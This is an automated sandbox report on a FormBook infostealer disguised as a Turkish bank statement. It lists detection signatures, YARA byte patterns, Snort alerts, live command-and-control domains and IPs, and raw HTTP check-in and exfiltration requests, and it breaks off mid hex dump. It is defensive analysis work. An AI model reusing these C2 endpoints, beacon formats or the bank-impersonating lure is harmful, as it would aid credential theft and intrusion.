Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe

Overview

General Information

Sample Name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
Analysis ID:808219
MD5:d668ae995548e2dc9b3193cb59ac9c02
SHA1:9419fbd2082f2ac33dd07c457e20839669de6ee7
SHA256:5f2de407396cfb921e5db52d5efb0fbfd44e7257630b079e02f83a1ed61ab4b4
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe (PID: 3340 cmdline: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe MD5: D668AE995548E2DC9B3193CB59AC9C02)
    • oaqcoreqiw.exe (PID: 2400 cmdline: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i MD5: 7719839B64AEF3F35ABECB784C0BDB46)
      • oaqcoreqiw.exe (PID: 5776 cmdline: C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe MD5: 7719839B64AEF3F35ABECB784C0BDB46)
        • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • wlanext.exe (PID: 5448 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18105:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ba1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18207:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1837f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.oaqcoreqiw.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.oaqcoreqiw.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x192ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.oaqcoreqiw.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x190b8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b54:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x191ba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19332:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9cd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ee2a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fddd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.oaqcoreqiw.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.oaqcoreqiw.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.7198.54.117.21549730802031453 02/15/23-08:43:11.353362
          SID:2031453
          Source Port:49730
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.7198.54.117.21549730802031412 02/15/23-08:43:11.353362
          SID:2031412
          Source Port:49730
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.7198.54.117.21549730802031449 02/15/23-08:43:11.353362
          SID:2031449
          Source Port:49730
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.78.8.8.850505532023883 02/15/23-08:41:49.483195
          SID:2023883
          Source Port:50505
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 35%
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 39%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.searchvity.com/?dn=URL Reputation: Label: malware
          Source: http://www.searchvity.com/URL Reputation: Label: malware
          Source: http://www.octohoki.net/ghii/Avira URL Cloud: Label: malware
          Source: http://www.hubyazilim.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZGAvira URL Cloud: Label: malware
          Source: http://www.octohoki.netAvira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64hAvira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/Avira URL Cloud: Label: malware
          Source: http://www.7dkjhk.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.ladybillplanet.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.genuineinsights.cloud/ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmytAvira URL Cloud: Label: malware
          Source: http://www.energybig.xyzAvira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeReversingLabs: Detection: 12%
          Machine Learning detection for sample
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeJoe Sandbox ML: detected
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.oaqcoreqiw.exe.1010000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: oaqcoreqiw.exe, 00000001.00000003.249486929.000000001AB90000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000001.00000003.248858259.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000011EF000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000003.257475218.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.305180491.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.000000000357F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.303312759.000000000312C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.0000000003460000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: oaqcoreqiw.exe, 00000001.00000003.249486929.000000001AB90000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000001.00000003.248858259.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000011EF000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000003.257475218.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.305180491.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.000000000357F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.303312759.000000000312C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.0000000003460000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: oaqcoreqiw.exe, 00000002.00000002.303761308.0000000001000000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: oaqcoreqiw.exe, 00000002.00000002.303761308.0000000001000000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1042 FindFirstFileW,FindClose,1_2_010A1042
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1050 FindFirstFileW,FindClose,1_2_010A1050
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A1042 FindFirstFileW,FindClose,2_2_010A1042
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A1050 FindFirstFileW,FindClose,2_2_010A1050

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50505 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 198.54.117.215:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.energybig.xyz
          Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZG HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2 HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmyt HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64h HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.96.162.149 66.96.162.149
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4d 6a 6e 66 4e 2d 59 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 52 31 65 48 6f 7e 71 52 4c 41 79 4e 4d 4c 62 54 39 6e 7a 43 4b 55 2e 00 00 00 00 00 00 00 00 Data Ascii: xMjnfN-Y=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(R1eHo~qRLAyNMLbT9nzCKU.
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.genuineinsights.cloudConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.genuineinsights.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.genuineinsights.cloud/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4d 6a 6e 66 4e 2d 59 3d 57 5f 42 47 48 56 4b 79 39 42 52 73 41 79 6c 48 66 4a 73 2d 79 6e 77 4a 62 75 4d 36 37 39 6f 4a 76 7a 45 4b 48 6f 49 72 61 53 32 72 4b 2d 59 66 63 36 44 6d 69 44 4b 58 38 2d 4d 4d 74 68 33 4c 48 62 54 6f 65 6b 78 58 67 56 34 31 42 65 56 5a 6e 56 73 49 32 6c 37 68 46 33 57 49 61 77 32 32 6d 2d 31 32 6b 59 4d 2d 64 56 51 69 5a 63 33 6e 74 31 47 70 4b 4c 57 7a 56 35 6f 58 66 48 4c 59 64 70 31 61 74 42 7e 65 30 4c 28 6a 59 61 6c 34 5a 5f 4d 6d 30 32 72 73 53 75 4b 76 6b 38 41 6b 63 46 67 73 38 36 47 74 52 57 65 78 52 7a 6a 59 38 75 49 43 55 30 55 2e 00 00 00 00 00 00 00 00 Data Ascii: xMjnfN-Y=W_BGHVKy9BRsAylHfJs-ynwJbuM679oJvzEKHoIraS2rK-Yfc6DmiDKX8-MMth3LHbToekxXgV41BeVZnVsI2l7hF3WIaw22m-12kYM-dVQiZc3nt1GpKLWzV5oXfHLYdp1atB~e0L(jYal4Z_Mm02rsSuKvk8AkcFgs86GtRWexRzjY8uICU0U.
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.octohoki.netConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.octohoki.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.octohoki.net/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4d 6a 6e 66 4e 2d 59 3d 72 5a 6e 54 4d 5a 52 69 46 75 51 4c 79 4e 6d 72 33 42 34 79 59 54 51 58 45 59 56 35 79 37 45 37 47 5a 4a 4e 63 41 77 4c 59 62 6f 54 41 43 56 37 45 59 4e 4f 49 4c 6c 41 74 35 35 63 64 4f 64 59 31 7a 71 51 34 36 59 6f 4c 50 4e 42 4d 67 51 4f 44 30 59 78 55 35 6d 4c 37 49 6d 47 71 45 6b 70 35 46 35 38 47 67 45 76 58 75 64 2d 4b 5a 32 31 30 64 6a 6e 37 50 76 35 45 75 51 63 73 43 52 53 58 67 35 54 45 49 76 35 41 53 66 39 76 46 31 49 55 6a 4d 68 75 6b 53 6b 4d 43 5a 77 71 78 4a 6d 49 30 31 6e 71 5a 39 4d 68 37 4f 2d 58 79 55 2d 50 6a 70 4c 66 61 41 2e 00 00 00 00 00 00 00 00 Data Ascii: xMjnfN-Y=rZnTMZRiFuQLyNmr3B4yYTQXEYV5y7E7GZJNcAwLYboTACV7EYNOILlAt55cdOdY1zqQ46YoLPNBMgQOD0YxU5mL7ImGqEkp5F58GgEvXud-KZ210djn7Pv5EuQcsCRSXg5TEIv5ASf9vF1IUjMhukSkMCZwqxJmI01nqZ9Mh7O-XyU-PjpLfaA.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Feb 2023 07:40:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 07:42:52 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 